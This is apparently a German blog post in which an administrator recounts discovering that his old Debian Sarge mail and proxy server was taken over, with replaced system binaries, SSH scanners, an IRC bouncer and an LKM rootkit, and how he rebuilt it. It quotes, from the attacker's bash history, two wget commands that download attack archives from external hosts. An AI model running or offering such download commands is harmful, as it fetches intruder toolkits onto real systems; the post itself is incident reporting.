Tja, irgendwann gibt immer ein erstes Mal. So nun auch für mich. Nein, damit spiele ich nicht auf die privaten Vergnügungen an, welches einem das Leben so bereiten kann.
Bei dem gestrigen Routine Update eines einfachen Linux Rechners, dessen Aufgabe nur darin besteht, Mails zu holen sowie Internet und Proxy Dienste bereit zu stellen, stellte sich heraus, dass er feindlich übernommen wurde.
Stutzig wurde ich dadurch, dass das Update von Courier nicht durchlaufen wollte. Die Art und Weise, wie die Pakete aktualisiert werden sollten, konnte nicht stimmen. Denn die Pfade waren falsch und ergaben keinen Sinn.
Ein weiterer Indiz bestand in dem funktionslosen top, welcher wohl mit einer anderen glibc Version übersetzt worden war und auf dem Debian Sarge nicht lief.
Dieses System konnte nur von einem Scippt Kiddy übernommen worden sein, denn er hat keinerlei Spuren verwischt, oder zumindestens nicht sorgfältig. Ein einfacher Blick in die Historie der Bash, brachte einige Aktionen zum Vorschein:
wget free-ftp.org/chowz/sh.tar.gz wget http://samiallam.free.fr/local.tar.gz
Beide Archive liegen mir noch vor, sollte jemand Interesse haben, sie genauer unter die Lupe zu nehmen, Kommentar reicht.
Die geladenen Archive enthielten unter anderem einige Systemprogramme und SSH-Scanner, mit einer eigens mitgebrachten Passwort Liste.
Mit einem selbst mitgebrachten pico Editor wurden dann die Apache Config angesehen und wohl auch bearbeitet. Das Root Kennwort wurde geändert (aber nicht mein Public-Key gelöscht). Die klassischen Programme, wie das eben bereits angesprochene top, aber auch ps, sysctl und andere Programme wurden ersetzt. Diese ließen sich auch nicht löschen. Vermutlich mit Hilfe von chattr entsprechend bearbeitet.
Ziel war es wohl, diesen Rechner als Sklaven zu verwenden, da er über einen IRCBouncer/Client verfügte. Eine genauere Untersuchung habe ich noch nicht vorgenommen, da meine primären Interessen der Neuinstallation gegolten haben.
Wie der Angreifer in das System gelangen konnte, liegt noch im dunkeln. Da ich in den Logs nichts auffälliges gefunden habe, scheint er über eine noch nicht korrigierte Sicherheitslücke eingedrungen zu sein. Wenn ich mal Zeit habe, werde ich das Image genauer betrachten.
Ich muss allerdings gestehen, dieses System gehörte mit zu meinen ältesten (und ersten) Linux Installation. Habe ich zu dieser Zeit mit Potato angefangen, ist es mittlerweile ein Sarge geworden. Dementsprechend besaß es eine gößere Angriffsfläche, als meine Neuen.
E-Mail Benutzer waren dort noch normale System Benutzer und die Kennwörter nicht die stärksten.
Auch war der Kernel nicht mehr der Jüngste, lag die Version noch bei 2.4.28. Dieser wurde nun durch einen 2.6.17 ersetzt, welcher nun auch keine Module mehr untersützt.
Denn ein Aufruf von einem bereits vorhandenem chkrootkit, brachte nicht nur die letzte Gewissheit über ein infiziertes System zu Tage, sondern auch ein LKM-Rootkit.
In einer Nacht und Nebel Aktion, wurde ein Ubuntu installiert und das bisherige E-Mail System, bestehend aus Courier-imapd und tpop3d, komplett auf Cyrus umgestellt, wobei die Benutzerdaten nun auch in einer Datenbank liegen.
Der SSH Dämone lässt Besucher nur ein, wenn das System einen gültigen Schlüssel vorfindet.
Damit ist dieser Rechner nun mit meinen anderen Installationen, gleich auf.
Alles in allem war es eine unruhige, und vor allem, kurze Nacht. Es gab noch kleine Proleme mit der Firewall, aber diese konnten schnell lokalisiert und behoben werden.
Einzig, Postfix und Saslauthd haben mich mehr Zeit als geplant gekostet, aber das ist nun auch vorbei.
Wenn jemand interesse hätte, mit mir zusammen das Image auseinander zu nehmen, kann gerne ebenfalls ein Kommentar hinterlassen.
Mein forensisches Wissen liegt noch nahe bei Null.